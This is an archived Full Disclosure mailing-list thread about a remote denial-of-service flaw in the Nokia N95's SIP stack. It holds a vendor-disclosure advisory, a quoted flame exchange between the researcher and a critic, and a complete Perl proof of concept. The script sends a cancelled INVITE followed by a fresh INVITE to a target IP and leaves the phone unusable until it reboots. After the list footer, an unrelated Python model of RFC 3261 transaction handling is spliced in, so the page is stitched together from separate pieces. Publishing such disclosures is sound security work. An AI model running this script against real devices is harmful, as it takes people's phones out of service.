Full Disclosure mailing list archives
Re: Nokia N95 cellphone remote DoS using the SIP Stack
From: state () loria fr
Date: Wed, 5 Dec 2007 20:57:13 +0100
Hi Reepex, I do not understand why you are frustrated about a computer science degree. Maybe someone got dropped out of a degree program and some psychological trauma gets activated when seeing a Ph.D? Whether you like it or not, in order to get a computer science degree, you will have to take classes, and most classes are taught by Ph.Ds. I will not argue with you on why I use the Ph.D in my signature, but if you really want to know, look at our research papers published in academic journals/conferences. (If you do not find them, I can send them to you.) If you ever understand the contents, then you will understand what our credentials are. :) This will probably never happen. At least I use a signature and a real name and do not hide behind a gmail account. Meanwhile, try yourself to find at least one vulnerability and enjoy Perl programming; it seems your computer science skills are somehow in this area :)

Greetings
RS

reepex <reepex () gmail com> wrote:
So almighty Phd, what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions'. Does this properly summarize your phd credentials? I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of'. I am sure you will serve the academic community great one day when you teach "hacking" classes revolving around the latest editions of hacking exposed.

On Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:

Nokia N95 cellphone remote DoS using the SIP Stack

Severity: High (Denial of Service)
Hardware: Nokia N95
Firmware: Tested version: Nokia RM-159 V 12.0.013

Notification:
Vulnerability found: 11 September 2007
Contact Nokia Support: 12 September 2007 / No reply
Contact Nokia Security Support: 19 September 2007 / No reply

Vulnerability Synopsis:
If the device has the SIP phone client activated, a sequence of SIP messages turns the device into an inconsistent state where the user is not able to operate it anymore until it reboots. The sequence of messages consists of two different SIP dialogs: the first initiates an INVITE transaction but immediately closes it (in an anticipated manner), while the second initiates a normal INVITE transaction that triggers the vulnerability of the target. The sequence of messages is illustrated below.
X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X ------------------------- CANCEL -----------------------> Nokiav12
X <----------------- OK (to the Cancel) ------------------- Nokiav12
X <---------------- 487 Request Terminated ---------------- Nokiav12
--------New Dialog--------
X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X <---------------------- 180 Trying ---------------------- Nokiav12
---- The device does not work properly anymore ----

Impact:
A remote entity can take down all the services of the cell phone.

Resolution:
As we did not get any proper reply from Nokia about the subject, the best way will be to disable the SIP client.

Credits:
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA Lorraine, using KiF, the Madynes VoIP fuzzer.
http://madynes.loria.fr/

Proof of Concept:
A Perl script (nokiav12.pl) is attached to this mail. Before launching it, the SIP phone has to be initialized in the target device.

Command: perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu

#!/usr/bin/perl
##################################################
# Vulnerability discovered using KiF ~ Kiph      #
#                                                #
# Authors:                                       #
#   Humberto J. Abdelnur (Ph.D Student)          #
#   Radu State (Ph.D)                            #
#   Olivier Festor (Ph.D)                        #
#                                                #
# Madynes Team, LORIA - INRIA Lorraine           #
# http://madynes.loria.fr                        #
##################################################
use strict;
use warnings;
use IO::Socket::INET;
use String::Random;

die "Usage: $0 <targetIP> <targetUser> <attackerIP> <attackerUser>\n"
    unless defined $ARGV[3];

my ($targetIP, $targetUser, $attackerIP, $attackerUser) = @ARGV;

# Bind the local side to 5060 too, so the phone's replies come back to the
# address and port announced in the Via header.
my $socket = IO::Socket::INET->new(
    Proto     => 'udp',
    PeerAddr  => $targetIP,
    PeerPort  => 5060,
    LocalPort => 5060,
) or die "Cannot create UDP socket: $@\n";

my $rnd = String::Random->new;

# SIP and SDP lines end in CRLF; the heredocs below are written with plain
# newlines and converted once here.
sub crlf { my $text = shift; $text =~ s/\n/\r\n/g; return $text; }

# SDP offer carried by both INVITEs
my $sdp = crlf(<<"SDP");
v=0
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP
s=-
c=IN IP4 $attackerIP
t=0 0
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13
a=sendrecv
a=ptime:20
a=maxptime:200
a=fmtp:96 mode-change-neighbor=1
a=fmtp:18 annexb=no
a=fmtp:98 0-15
a=rtpmap:96 AMR/8000/1
a=rtpmap:0 PCMU/8000/1
a=rtpmap:8 PCMA/8000/1
a=rtpmap:97 iLBC/8000/1
a=rtpmap:18 G729/8000/1
a=rtpmap:98 telephone-event/8000/1
a=rtpmap:13 CN/8000/1
SDP
my $sdplen = length $sdp;

# INVITE for a fresh dialog: Call-ID and CSeq are random, $n numbers the
# Via branch and the From tag.
sub invite {
    my ($callid, $cseq, $n) = @_;
    return crlf(<<"MSG") . "\r\n" . $sdp;
INVITE sip:$targetUser\@$targetIP SIP/2.0
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK$n
From: <sip:$attackerUser\@$attackerIP>;tag=$n
To: <sip:$targetUser\@$targetIP>
Call-ID: $callid\@$attackerIP
CSeq: $cseq INVITE
Max-Forwards: 70
Contact: <sip:$attackerUser\@$attackerIP>
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE
Content-Type: application/sdp
Content-Length: $sdplen
MSG
}

# CANCEL for the INVITE above: same branch, Call-ID and CSeq number.
sub cancel {
    my ($callid, $cseq, $n) = @_;
    return crlf(<<"MSG");
CANCEL sip:$targetUser\@$targetIP SIP/2.0
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK$n
From: <sip:$attackerUser\@$attackerIP>;tag=$n
To: <sip:$targetUser\@$targetIP>;tag=$n
Call-ID: $callid\@$attackerIP
CSeq: $cseq CANCEL
Max-Forwards: 70
Content-Length: 0

MSG
}

# Dialog 1: INVITE, wait for the 100 Trying, then cancel the transaction
# straight away.
my $callid = $rnd->randpattern("CCccnCn");
my $cseq   = $rnd->randregex('\d\d\d\d');

$socket->send(invite($callid, $cseq, 1));
my $reply = '';
until ($reply =~ /^SIP\/2\.0 100/) {
    $socket->recv($reply, 1024, 0);
}
$socket->send(cancel($callid, $cseq, 1));
sleep 1;

# Dialog 2: a normal INVITE in a new dialog; this is the one that leaves
# the phone unusable.
$callid = $rnd->randpattern("CCccnCn");
$cseq   = $rnd->randregex('\d\d\d\d');
$socket->send(invite($callid, $cseq, 2));

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
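Added example, not part of the advisory above and not code from the Madynes team: a small Python model of what an RFC 3261 INVITE server transaction is expected to do when fed the exact sequence the advisory describes (INVITE, CANCEL while the transaction is still in Proceeding, 200 OK to the CANCEL, 487 to the INVITE, then a fresh INVITE in a new dialog). The point it shows is that the two INVITEs are separate transactions keyed by the Via branch, so the cancelled one must not leak into the second; it also answers 481 to a CANCEL that matches no transaction and leaves a transaction alone when a CANCEL arrives after its final response, which is the edge the advisory's sequence sits next to. The hosts, users, tags and Call-IDs in the constructed messages are placeholders, and the class and function names are my own.

```python
import re

CRLF = "\r\n"


def parse_sip(raw):
    """Split a SIP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def transaction_key(headers):
    """RFC 3261 section 17.2.3: a server transaction is identified by the top Via
    branch plus the method; CANCEL and ACK are matched to the INVITE transaction."""
    branch = re.search(r"branch=([^;\s]+)", headers["via"]).group(1)
    method = headers["cseq"].split()[1].upper()
    return (branch, "INVITE" if method in ("CANCEL", "ACK") else method)


def build_response(h, code, reason, to_tag=None, cseq_method=None):
    """Responses copy Via/From/To/Call-ID/CSeq from the request (RFC 3261 section 8.2.6)."""
    to = h["to"] + (f";tag={to_tag}" if to_tag and "tag=" not in h["to"] else "")
    num, method = h["cseq"].split()
    return CRLF.join([
        f"SIP/2.0 {code} {reason}",
        f"Via: {h['via']}", f"From: {h['from']}", f"To: {to}",
        f"Call-ID: {h['call-id']}", f"CSeq: {num} {cseq_method or method}",
        "Content-Length: 0",
    ]) + CRLF + CRLF


class InviteServerTransaction:
    """RFC 3261 section 17.2.1 INVITE server transaction, reduced to the
    Proceeding -> Completed -> Confirmed path this message sequence exercises."""

    def __init__(self, headers, local_tag):
        self.state = "Proceeding"
        self.headers = headers          # the INVITE's headers, reused for every response
        self.local_tag = local_tag

    def response(self, code, reason, cseq_method=None):
        return build_response(self.headers, code, reason, self.local_tag, cseq_method)


class SipUas:
    """A user-agent server that keeps one state machine per transaction."""

    def __init__(self, local_tag="n95"):
        self.transactions = {}
        self.local_tag = local_tag

    def handle(self, raw):
        """Feed one request; return the responses sent back, in order."""
        start, h, _ = parse_sip(raw)
        method = start.split()[0]
        tx = self.transactions.get(transaction_key(h))
        if method == "INVITE":
            if tx is None:                      # new branch: new transaction, new dialog
                tx = InviteServerTransaction(h, self.local_tag)
                self.transactions[transaction_key(h)] = tx
                return [tx.response(100, "Trying")]
            if tx.state == "Completed":         # retransmitted INVITE: resend the final
                return [tx.response(487, "Request Terminated")]
            return []
        if method == "CANCEL":
            # Section 9.2: the CANCEL gets its own 200 OK; the INVITE gets a 487 only
            # if no final response was sent yet. A late or stray CANCEL changes nothing.
            if tx is None:
                return [build_response(h, 481, "Call/Transaction Does Not Exist")]
            out = [tx.response(200, "OK", cseq_method="CANCEL")]
            if tx.state == "Proceeding":
                tx.state = "Completed"
                out.append(tx.response(487, "Request Terminated"))
            return out
        if method == "ACK":
            if tx is not None and tx.state == "Completed":
                tx.state = "Confirmed"          # ACK to the 487 closes the transaction
            return []
        return [build_response(h, 405, "Method Not Allowed")]

    def ring(self, branch):
        """The user is alerted: 180 Ringing, but only while the INVITE is still live."""
        tx = self.transactions.get((branch, "INVITE"))
        return [tx.response(180, "Ringing")] if tx and tx.state == "Proceeding" else []


def request(method, branch, from_tag, call_id, cseq, to_tag=None):
    """Attacker-side request, constructed for this example (hosts/users are placeholders)."""
    to = "<sip:lupilu@192.0.2.10>" + (f";tag={to_tag}" if to_tag else "")
    return CRLF.join([
        f"{method} sip:lupilu@192.0.2.10 SIP/2.0",
        f"Via: SIP/2.0/UDP 192.0.2.2;branch={branch}",
        f"From: <sip:tucu@192.0.2.2>;tag={from_tag}",
        f"To: {to}", f"Call-ID: {call_id}@192.0.2.2", f"CSeq: {cseq} {method}",
        "Max-Forwards: 70", "Content-Length: 0",
    ]) + CRLF + CRLF


def replay_advisory_sequence():
    """Drive the UAS through the advisory's two dialogs; return the exchange as start
    lines ('>' sent to the phone, '<' sent by it) and the final transaction states."""
    uas, log = SipUas(), []

    def send(req):
        log.append("> " + req.split(CRLF)[0])
        log.extend("< " + r.split(CRLF)[0] for r in uas.handle(req))

    send(request("INVITE", "z9hG4bK1", "1", "call1", 1))              # dialog 1
    send(request("CANCEL", "z9hG4bK1", "1", "call1", 1))              # cancelled after 100 Trying
    send(request("ACK", "z9hG4bK1", "1", "call1", 1, to_tag="n95"))   # acks the 487
    send(request("INVITE", "z9hG4bK2", "2", "call2", 1))              # dialog 2, normal INVITE
    log.extend("< " + r.split(CRLF)[0] for r in uas.ring("z9hG4bK2"))
    states = {branch: tx.state for (branch, _), tx in uas.transactions.items()}
    return log, states


if __name__ == "__main__":
    exchange, final = replay_advisory_sequence()
    print("\n".join(exchange))
    print(final)
```

Run stand-alone it prints the nine start lines of the exchange and the final states, Confirmed for branch z9hG4bK1 and Proceeding for z9hG4bK2; a stack that keeps per-branch state this way has nothing left over from the first dialog to trip on when the second INVITE arrives.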
Current thread:
- Nokia N95 cellphone remote DoS using the SIP Stack Radu State (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack nnp (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack Humberto Abdelnur (Dec 06)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)